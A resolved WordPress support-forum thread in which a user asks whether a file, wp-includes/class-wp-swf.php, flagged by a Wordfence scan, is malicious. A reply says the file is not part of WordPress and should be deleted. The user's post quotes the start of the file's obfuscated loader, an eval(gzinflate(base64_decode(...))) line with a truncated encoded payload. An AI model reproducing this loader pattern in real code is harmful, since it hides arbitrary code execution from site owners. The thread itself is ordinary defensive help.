Getting a scan warning on file class-wp-swf.php

  • Resolved LMD99

    (@lmd99)


    8 years, 8 months ago

    The file is located: wp-includes/class-wp-swf.php and am getting the following warning after a recent scan:

    This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: “eval(gzinflate(base64_decode”. The infection type is: Suspicious eval with base64 decode.

    I was able to look inside this file and it has hundreds of lines that look like this:<?php

    error_reporting(0);

    eval(gzinflate(base64_decode(‘5b39dxq3EjD8c+4593+Qt9wuNBgDTnpTbLATx06cJnbqjyRtnIcusMDWC0t3F2Mn9f/+zIw+VtoPjJP2Puc9r3NigzQajb5Go9FopuTM43F35kQRazPL2vr3v0r9wA9C/PbdYPiYUgbu0Jn7cdfpx14whSz7wPPd6I0ztfXseeR2nT+cawCIw7mrZ/XHThi5MRZ9700HwSJabzQfN7D4v…

    The code goes on for dozens and dozens of lines though.

    Please advise if this an issue and file should be removed or if it is a false positive.

    https://www.ads-software.com/plugins/wordfence/

Viewing 1 replies (of 1 total)

  • Hi LMD99,
    This file “wp-includes/class-wp-swf.php” you referred to isn’t included in a default WordPress installation, so please delete it, also the code you mentioned seems to be suspicious to me.

    I recommend downloading a fresh copy of WordPress, and upload both (wp-admin and wp-includes folders) to your server replacing the current ones, then re-scan again.

    Thanks.

Viewing 1 replies (of 1 total)
  • The topic ‘Getting a scan warning on file class-wp-swf.php’ is closed to new replies.